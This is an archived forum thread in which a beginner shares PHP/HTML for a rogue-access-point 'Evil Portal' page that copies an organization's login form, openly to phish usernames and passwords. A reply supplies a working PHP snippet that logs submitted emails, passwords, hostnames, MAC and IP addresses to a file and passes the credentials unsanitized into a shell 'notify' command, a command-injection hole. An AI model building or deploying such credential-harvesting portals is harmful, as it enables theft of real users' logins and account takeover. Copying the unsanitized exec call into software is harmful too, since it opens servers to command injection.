Redenbacher Posted October 8, 2018 Share Posted October 8, 2018 Hello All, So I'm a beginner NANO user. I installed the Evil Portal module and loaded it up. I created a "Basic" html landing page for clients to visit once they connect to the open AP. I added username & password fields, mimicking the style of my organization's login page, with HTML. My objective is to phish the usernames and passwords by sending them to a txt file or log entry. Could someone help point me in the right direction on how to program data values to be added to a log entry? This is the index.php for my login portal. <?php $destination = "http://" . $_SERVER['HTTP_HOST'] . $_SERVER['HTTP_URI'] . ""; require_once('helper.php'); ?> <HTML> <HEAD> <title>Wireless Portal</title> <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" /> <meta http-equiv="Pragma" content="no-cache" /> <meta http-equiv="Expires" content="0" /> <meta name="viewport" content="width=device-width, initial-scale=1"> </HEAD> <BODY> <div style="text-align: center;"> <h1>Orginization Login</h1> <p>Sign in with your Org email account.</p> <p>Make sure to include your full email address </p> <p><strong>jdoe@email.orginization.edu (For Students)</strong> or </p> <p><strong>jdoe@orginization.edu (For Staff/Faculty)</strong></p> <form> Username:<br> <input type="text" name="username"><br> Password:<br> <input type="text" name="password"> </form> <form method="POST" action="/captiveportal/index.php"> /*could I POST the data to the log?*/ <input type="hidden" name="target" value="<?=$destination?>"> <button type="submit">Sign in</button> </form> </div> </BODY> </HTML> Link to comment Share on other sites More sharing options...
JointEffort Posted October 9, 2018 Share Posted October 9, 2018 Take a look at the portals at https://github.com/kbeflo/evilportals, for example, see the facebook-login: Snippet: if (isset($_POST['email'])) { $email = isset($_POST['email']) ? $_POST['email'] : 'email'; $pwd = isset($_POST['password']) ? $_POST['password'] : 'password'; $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname'; $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac'; $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip'; file_put_contents("$dir/evilportal-logs/facebook-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND); exec("notify $email' - '$pwd"); } Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.